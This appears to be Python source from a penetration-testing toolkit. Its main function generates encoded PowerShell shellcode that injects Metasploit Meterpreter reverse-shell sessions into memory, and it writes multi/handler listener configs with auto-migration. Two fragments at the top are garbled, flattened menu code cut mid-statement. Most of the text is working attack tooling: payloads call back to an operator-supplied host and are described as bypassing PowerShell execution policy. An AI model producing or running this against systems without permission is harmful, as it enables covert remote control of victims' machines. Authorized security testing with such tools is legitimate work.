This technique was introduced by Matthew Graeber (http://www.exploit-monday.com/2011/10/exploiting-powershells-features-not.html) """) payload = input('Enter the payload name [or Enter for windows/meterpreter/reverse_http]: ') if payload == '': payload = 'windows/meterpreter/reverse_http' # create base metasploit payload to pass to powershell.prep with open(os.path.join(core.setdir + "metasploit.payload"), 'w') as filewrite: filewrite.write(payload) ipaddr = input("Enter the IP of the LHOST: ") port = input("Enter the port for the LHOST: ") shellcode = core.generate_powershell_alphanumeric_payload(payload, ipaddr, port, "") with open(os.path.join(core.setdir + 'x86.powershell'), 'w') as filewrite: filewrite.write(shellcode) time.sleep(3) with open(os.path.join(core.setdir + "x86.powershell")) as fileopen: pass # read in x amount of bytes data_read = int(50) output_variable = "#define __PROG_TYPES_COMPAT__\n#include <avr/pgmspace.h>\n" counter = 0 while True: reading_encoded = fileopen.read(data_read).rstrip() if not reading_encoded:
The powershell - shellcode injection leverages powershell to send a meterpreter session straight into memory without ever touching disk. This technique was introduced by Matthew Graeber (http://www.exploit-monday.com/2011/10/exploiting-powershells-features-not.html) """) # define standard metasploit payload payload = "windows/meterpreter/reverse_tcp" # create base metasploit payload to pass to powershell.prep with open(os.path.join(core.setdir + "metasploit.payload"), 'w') as filewrite: filewrite.write(payload) ipaddr = input("Enter the IP for the reverse: ") port = input("Enter the port for the reverse: ") shellcode = core.generate_powershell_alphanumeric_payload( payload, ipaddr, port, "") with open(os.path.join(core.setdir + 'x86.powershell', 'w')) as filewrite: filewrite.write(shellcode) time.sleep(3) with open(os.path.join(core.setdir + "x86.powershell")) as fileopen: pass # read in x amount of bytes data_read = int(50) output_variable = "#define __PROG_TYPES_COMPAT__\n#define PROGMEM\n#include <avr/pgmspace.h>\n" counter = 0 while True: reading_encoded = fileopen.read(data_read).rstrip() if not reading_encoded:
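def _handler_resource(payload, ipaddr, port, stage_encoding, auto_migrate):
    """Return one ``exploit/multi/handler`` stanza for a Metasploit resource file.

    Args:
        payload: Metasploit payload name written as ``set PAYLOAD``.
        ipaddr: value written as ``set LHOST``.
        port: value written as ``set LPORT``.
        stage_encoding: ``"true"``/``"false"``, written as ``set EnableStageEncoding``.
        auto_migrate: the AUTO_MIGRATE config value; ``"ON"`` adds the
            ``post/windows/manage/smart_migrate`` AutoRunScript line.

    Returns:
        The stanza text, starting with a newline and ending with a blank line so
        consecutive stanzas stay separated when appended to the same file.
    """
    lines = ["", "use exploit/multi/handler"]
    if auto_migrate == "ON":
        lines.append("set AutoRunScript post/windows/manage/smart_migrate")
    lines += [
        "set PAYLOAD {0}".format(payload),
        "set LHOST {0}".format(ipaddr),
        "set LPORT {0}".format(port),
        "set EnableStageEncoding {0}".format(stage_encoding),
        "set ExitOnSession false",
        "exploit -j",
        "",
        "",
    ]
    return "\n".join(lines)


def _append_handler(config_path, payload, ipaddr, port, stage_encoding, auto_migrate):
    """Append a multi/handler stanza for *port* to the resource file at *config_path*."""
    with open(config_path, "a") as filewrite:
        filewrite.write(_handler_resource(payload, ipaddr, port, stage_encoding, auto_migrate))


def prep_powershell_payload():
    """Generate the x86 PowerShell injection payload and write it to ``x86.powershell``.

    Reads the SET config/option values through ``core`` (STAGE_ENCODING,
    POWERSHELL_SOLO, PORT, AUTO_MIGRATE, PYINJECTION, IPADDR,
    POWERSHELL_MULTI_INJECTION, POWERSHELL_INJECT_PAYLOAD_X86,
    POWERSHELL_MULTI_PORTS, POWERSHELL_VERBOSE), prompts on stdin for the IP
    address and port when they are not set, and appends an
    ``exploit/multi/handler`` stanza for every generated payload to
    ``meta_config`` or ``meta_config_multipyinjector`` under ``core.setdir`` so
    the listener configuration matches what was generated.

    Three modes are selected from the options above: a single payload on
    PORT, one payload per port in POWERSHELL_MULTI_PORTS, or one payload per
    ``payload<space>port`` entry in ``payload_options.shellcode``
    (pyinjection). Multi-payload results are joined with ``","``.

    Side effects: stdin prompts, writes ``<setdir>/x86.powershell`` and
    appends to the resource files above. Returns None.
    """
    # grab stage encoding flag; written verbatim as EnableStageEncoding
    stage_encoding = core.check_config("STAGE_ENCODING=").lower()
    stage_encoding = "false" if stage_encoding == "off" else "true"

    # check to see if we are just generating powershell code
    powershell_solo = core.check_options("POWERSHELL_SOLO")

    # check if port is there
    port = core.check_options("PORT=")

    # check if we are using auto_migrate
    auto_migrate = core.check_config("AUTO_MIGRATE=")

    # check if we are using pyinjection; only honoured when the payload
    # options file it depends on actually exists
    pyinjection = core.check_options("PYINJECTION=")
    if pyinjection == "ON":
        if os.path.isfile(os.path.join(core.setdir, "payload_options.shellcode")):
            pyinjection = "on"
            core.print_status("Multi/Pyinjection was specified. Overriding config options.")
        else:
            pyinjection = "off"

    # grab ipaddress (prompt for it and persist it when not already set)
    if core.check_options("IPADDR=") != 0:
        ipaddr = core.check_options("IPADDR=")
    else:
        ipaddr = input("Enter the ipaddress for the reverse connection: ")
        core.update_options("IPADDR=" + ipaddr)

    # check to see if we are using multi powershell injection
    multi_injection = core.check_config("POWERSHELL_MULTI_INJECTION=").lower()

    # turn off multi injection if pyinjection is specified
    if pyinjection == "on":
        multi_injection = "off"

    # check what payloads we are using
    powershell_inject_x86 = core.check_config("POWERSHELL_INJECT_PAYLOAD_X86=")

    # if we specified a hostname then default to reverse http
    if not core.validate_ip(ipaddr):
        powershell_inject_x86 = "windows/meterpreter/reverse_http"

    multipy_config = os.path.join(core.setdir, "meta_config_multipyinjector")
    meta_config = os.path.join(core.setdir, "meta_config")
    # single-payload mode: neither multi injection nor pyinjection is active
    single_mode = multi_injection != "on" and pyinjection == "off"

    # prompt what port to listen on for powershell then make an append to the
    # current metasploit answer file
    if os.path.isfile(multipy_config):
        # if we have multi injection on, don't worry about these
        if single_mode:
            core.print_status("POWERSHELL_INJECTION is set to ON with multi-pyinjector")
            port = input(core.setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
            if not port:
                port = "443"
            with open(multipy_config) as fileopen:
                data = fileopen.read()
            # re.escape: the port is operator input used as a pattern, so a
            # stray metacharacter would otherwise raise re.error
            if not re.search(re.escape(port), data):
                _append_handler(multipy_config, powershell_inject_x86, ipaddr, port,
                                stage_encoding, auto_migrate)
    elif single_mode:
        # no multi pyinjector config: take PORT from the options file, else prompt
        if core.check_options("PORT=") != 0:
            port = core.check_options("PORT=")
        else:
            port = input(core.setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
            if not port:
                port = "443"
            core.update_options("PORT={0}".format(port))

    # turn off multi_injection if we are riding solo from the powershell menu
    if powershell_solo == "ON":
        multi_injection = "off"
        pyinjection = "on"

    # if we are using multi powershell injection
    if multi_injection == "on" and pyinjection == "off":
        core.print_status("Multi-Powershell-Injection is set to ON, this should be sweet...")

    # define a base variable: the fourth generate_powershell_alphanumeric_payload
    # argument, always empty from here on
    x86 = ""

    # one encoded payload per port/payload pair, joined with "," at the end
    injections = []

    if multi_injection == "on":
        # iterate through the ports, used for POWERSHELL_MULTI_PORTS
        for multi_port in core.check_config("POWERSHELL_MULTI_PORTS=").split(","):
            # dont cycle through if theres a blank
            if not multi_port:
                continue
            core.print_status("Generating x86-based powershell injection code for port: {0}".format(multi_port))
            injections.append(core.generate_powershell_alphanumeric_payload(
                powershell_inject_x86, ipaddr, multi_port, x86))

            if os.path.isfile(multipy_config):
                if not core.check_ports(multipy_config, multi_port):
                    _append_handler(multipy_config, powershell_inject_x86, ipaddr, multi_port,
                                    stage_encoding, auto_migrate)
            else:
                # if meta config isn't created yet then create it (the original
                # called os.path.isfile() with no argument here, a TypeError)
                if not os.path.isfile(meta_config):
                    with open(meta_config, "w") as filewrite:
                        filewrite.write("")
                if not core.check_ports(meta_config, multi_port):
                    _append_handler(meta_config, powershell_inject_x86, ipaddr, multi_port,
                                    stage_encoding, auto_migrate)

    # here we do everything if pyinjection or multi pyinjection was specified
    if pyinjection == "on":
        # read in the file we need for parsing: comma separated
        # payload<space>port entries, normally with a trailing comma
        with open(os.path.join(core.setdir, "payload_options.shellcode")) as fileopen:
            payloads = fileopen.read().strip().rstrip(",")
        for spec in payloads.split(","):
            spec = spec.strip()
            if not spec:
                continue
            parts = spec.split(" ")
            if len(parts) < 2:
                # a bare payload without a port cannot be turned into a handler
                core.print_status("Skipping malformed payload option entry: {0}".format(spec))
                continue
            powershell_inject_x86, port = parts[0], parts[1]
            core.print_status("Generating x86-based powershell injection code...")
            injections.append(core.generate_powershell_alphanumeric_payload(
                powershell_inject_x86, ipaddr, port, x86))

    # if its turned to off: a single payload on the single PORT
    if multi_injection == "off" and pyinjection == "off":
        core.print_status("Generating x86-based powershell injection code...")
        x86 = core.generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, port, x86)

    # if we are specifying multi powershell injection: join with ",". The
    # former leading-comma + [1:] trick is gone; it dropped the first byte of
    # the first payload in pyinjection mode, where the list was already
    # ",".join()ed without a leading comma.
    if multi_injection == "on" or pyinjection == "on":
        x86 = ",".join(injections)

    # check to see if we want to display the powershell command to the user
    verbose = core.check_config("POWERSHELL_VERBOSE=")
    if verbose.lower() == "on":
        core.print_status("Printing the x86 based encoded code...")
        time.sleep(3)
        print(x86)

    with open(os.path.join(core.setdir, "x86.powershell"), "w") as filewrite:
        filewrite.write(x86)

    core.print_status("Finished generating powershell injection bypass.")
    core.print_status("Encoded to bypass execution restriction policy...")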